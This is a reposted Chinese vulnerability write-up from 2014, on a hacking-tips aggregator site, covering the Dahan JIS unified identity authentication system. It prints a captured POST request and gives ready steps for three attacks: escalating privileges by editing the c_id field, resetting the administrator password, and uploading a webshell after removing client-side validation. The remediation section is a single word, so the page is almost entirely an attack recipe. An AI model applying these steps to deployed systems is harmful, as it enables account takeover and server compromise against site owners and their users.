记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

大汉通版jis统一身份认证系统漏洞打包

2014-01-23 13:00
大汉通版jis统一身份认证系统:
 
在用户修改信息时进行抓包发现
 
POST:
 
http://10.11.5.201:9080/jis/front/upduser_do.jsp
 
CONTENT:
 
c_id=00000&vc_loginid=admin&vc_password=123456&vc_pwd=123456&vc_username=系统管理员&vc_headship=&vc_comptel=&vc_compfax=&vc_mobile=&vc_email=&vc_qq=&vc_msn=&vc_hometel=&vc_usergroupid=&vc_usergroupname=
 
 
经过验证c_id为权限控制字段,00000为管理员,vc_loginid为登陆名称,vc_password以及
 
vc_pwd为密码,
 
(1)用户权限提升:
 
在修改个人信息时进行抓包,将c_id修改成0000,即可提升为系统管理员,
 
(2)重置管理员密码
 
将c_id改为00000以及将登陆名称vc_loginid改成admin 密码修改为自己的即可
 
(3)任意文件上传漏洞
 
 
上传地址:http://url//jis/update/update.jsp
 
 
去掉本地js验证
 
shell地址:http://10.11.5.201:9080/jis/update/data/上传的文件名
 

修复方案:

控制
知识来源: www.2cto.com/Article/201401/274650.html

阅读:82292 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“大汉通版jis统一身份认证系统漏洞打包”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云